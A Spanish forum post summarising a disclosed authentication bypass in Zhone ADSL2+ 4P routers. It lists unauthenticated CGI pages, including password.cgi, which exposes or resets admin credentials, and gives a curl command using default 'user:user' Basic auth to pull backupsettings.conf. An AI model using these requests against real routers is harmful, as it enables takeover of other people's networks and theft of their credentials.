Foro Wifi-libre.com

Obtención de privilegios de administrador en la gama  Zhone ADSL2+ 4P

  No conocía a la marca Zhone.

Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias  madres;  son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850)
  Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
  La información fue también puesta en packet storm:

• Zhone ADSL2+ 4P Authentiation Bypass /  … Disclosure

¿Quieres ser root?

1. Puedes acceder a estas tres paginas mediante http sin conocer los credenciales

   http://[LOCALHOST]:?/pvccfg.cgi
   http://[LOCALHOST]:?/dnscfg.cgi
   http://[LOCALHOST]:?/password.cgi  (In addition to text storage of sensitive information!)

2. En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador. 
   Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.

   curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" 

   ( ("dXNlcjp1c2Vy" = "user:user" en base64))

Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.